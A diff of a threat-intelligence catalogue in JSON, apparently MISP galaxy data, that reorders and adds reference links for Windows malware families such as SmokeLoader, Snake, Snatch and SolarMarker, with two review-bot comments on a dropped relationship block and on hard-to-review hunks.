"https://malpedia.caad.fkie.fraunhofer.de/details/win.smokedham",
- "https://www.mandiant.com/resources/burrowing-your-way-into-vpns",
"https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise",
+ "https://www.mandiant.com/resources/burrowing-your-way-into-vpns",
"https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"
],
"synonyms": [],
@@ -42212,71 +44486,77 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.cert.pl/en/news/single/dissecting-smoke-loader/",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
- "https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://x0r19x91.in/malware-analysis/smokeloader/",
- "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities",
- "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html",
- "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis",
- "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.silentpush.com/blog/privacy-tools-not-for-you",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html",
- "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view",
- "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
- "https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html",
- "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/",
- "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html",
- "https://asec.ahnlab.com/en/33600/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/",
- "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait",
- "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
- "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/",
- "https://research.checkpoint.com/2019-resurgence-of-smokeloader/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer",
- "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
- "https://suvaditya.one/malware-analysis/smokeloader/",
- "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/",
- "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign",
- "https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md",
- "https://hatching.io/blog/tt-2020-08-27/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/",
- "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/",
- "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
- "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://m.alvar.es/2020/06/unpacking-smokeloader-and.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886",
"https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/",
- "https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html",
- "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
+ "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886",
+ "https://x0r19x91.in/malware-analysis/smokeloader/",
+ "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
+ "https://research.checkpoint.com/2019-resurgence-of-smokeloader/",
+ "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html",
+ "https://hatching.io/blog/tt-2020-08-27/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://youtu.be/QOypldw6hnY?t=3237",
+ "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft",
+ "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://www.cert.pl/en/news/single/dissecting-smoke-loader/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md",
+ "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign",
"https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo",
+ "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
+ "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf",
+ "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/",
+ "https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
"https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/",
- "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer"
+ "https://www.silentpush.com/blog/privacy-tools-not-for-you",
+ "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html",
+ "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities",
+ "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html",
+ "https://m.alvar.es/2020/06/unpacking-smokeloader-and.html",
+ "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer",
+ "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html",
+ "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
+ "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/",
+ "https://suvaditya.one/malware-analysis/smokeloader/",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/",
+ "https://asec.ahnlab.com/en/33600/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://asec.ahnlab.com/en/36634/",
+ "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html",
+ "https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd",
+ "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait",
+ "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
+ "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html"
],
"synonyms": [
"Dofoil",
@@ -42294,8 +44574,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru",
- "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/",
- "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators"
+ "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
+ "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
],
"synonyms": [
"Ismo"
@@ -42337,31 +44617,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snake",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md",
+ "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html",
"https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://twitter.com/bad_packets/status/1270957214300135426",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/",
+ "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html",
+ "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
+ "https://www.goggleheadedhacker.com/blog/post/22",
+ "https://twitter.com/milkr3am/status/1270019326976786432",
+ "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/",
+ "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
"https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
"https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017",
"https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/",
- "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/",
- "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems",
- "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
- "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/",
- "https://twitter.com/bad_packets/status/1270957214300135426",
- "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware",
- "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/",
- "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html",
- "https://www.goggleheadedhacker.com/blog/post/22",
"https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/",
- "https://twitter.com/milkr3am/status/1270019326976786432",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/",
- "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
- "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/"
+ "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/",
+ "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md"
],
"synonyms": [
"EKANS",
@@ -42377,18 +44657,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch",
- "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
- "https://twitter.com/VK_Intel/status/1191414501297528832",
"https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md",
+ "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
"https://thedfirreport.com/2020/06/21/snatch-ransomware/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md",
- "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://twitter.com/VK_Intel/status/1191414501297528832",
+ "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/"
],
"synonyms": [],
"type": []
@@ -42401,6 +44681,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto",
+ "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/",
+ "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html",
"https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf",
"https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/"
],
@@ -42415,11 +44697,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader",
+ "https://www.youtube.com/watch?v=k3sM88o_maM",
"https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/",
"https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/",
- "https://www.youtube.com/watch?v=k3sM88o_maM",
- "https://twitter.com/VK_Intel/status/898549340121288704",
- "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/"
+ "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/",
+ "https://twitter.com/VK_Intel/status/898549340121288704"
],
"synonyms": [],
"type": []
@@ -42447,26 +44729,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula",
- "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf",
"https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
"https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
- "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/"
+ "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf",
+ "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
+ "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
+ "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef"
],
"synonyms": [
"Ursnif"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "75b01a1e-3269-4f4c-bdba-37af4e9c3f54",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa",
"value": "Snifula"
},
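Review bot: this hunk silently removes the Snifula "related" block, dropping the "similar" relationship to dest-uuid 75b01a1e-3269-4f4c-bdba-37af4e9c3f54 together with its estimative-language "almost-certain" tag, while the visible change otherwise only adds one ref and reorders the rest. Nothing in the patch explains the removal; if the regenerated data simply lacks relationship information, the block should be carried over, otherwise the reason belongs in the commit message, since consumers that pivot on related clusters will lose that link.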
@@ -42528,10 +44802,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars",
- "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
"https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/",
"https://twitter.com/VK_Intel/status/1201584107928653824",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
],
"synonyms": [],
@@ -42545,10 +44820,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sockbot",
- "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/",
- "https://www.youtube.com/watch?v=CAMnuhg-Qos",
"https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf"
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf",
+ "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/",
+ "https://www.youtube.com/watch?v=CAMnuhg-Qos"
],
"synonyms": [],
"type": []
@@ -42573,10 +44848,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta",
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "https://threatminer.org/report.php?q=Accenture-Goldfin-Security-Alert.pdf&y=2018",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
],
"synonyms": [
@@ -42593,12 +44870,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
"https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf"
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
],
"synonyms": [
"DelfsCake",
@@ -42615,9 +44892,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot",
- "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/",
+ "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/",
"https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/",
- "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/"
+ "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/"
],
"synonyms": [
"Napolar"
@@ -42632,22 +44909,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker",
- "https://twitter.com/MsftSecIntel/status/1403461397283950597",
- "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/",
- "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction",
- "https://unit42.paloaltonetworks.com/solarmarker-malware/",
- "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more",
- "https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/",
- "https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf",
- "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise",
- "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer",
- "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
"https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
+ "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer",
+ "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more",
+ "https://unit42.paloaltonetworks.com/solarmarker-malware/",
+ "https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf",
+ "https://twitter.com/MsftSecIntel/status/1403461397283950597",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/",
+ "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction",
+ "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
"https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer",
"https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html",
"https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/",
+ "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/",
"https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker"
+ "https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker",
+ "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
],
"synonyms": [
"Jupyter",
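Review bot: the two genuinely new references in this hunk, the CIS "top-10-malware-march-2022" post and the squiblydoo "solarmarker-the-old-is-new" write-up, are buried among eleven removed and thirteen added lines, of which eleven merely re-add URLs removed above them, so a reviewer has to diff the two URL sets by hand to find them. Splitting reference reordering from reference additions (or landing a stable-order change first) would make hunks like this one reviewable at a glance.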
@@ -42686,6 +44965,19 @@
"uuid": "2b2cffc5-bf6e-4636-a906-829c32115655",
"value": "SombRAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.somnia",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "907ed2ce-5407-4e4d-9b1a-596d5489b008",
+ "value": "Somnia"
+ },
{
"description": "",
"meta": {
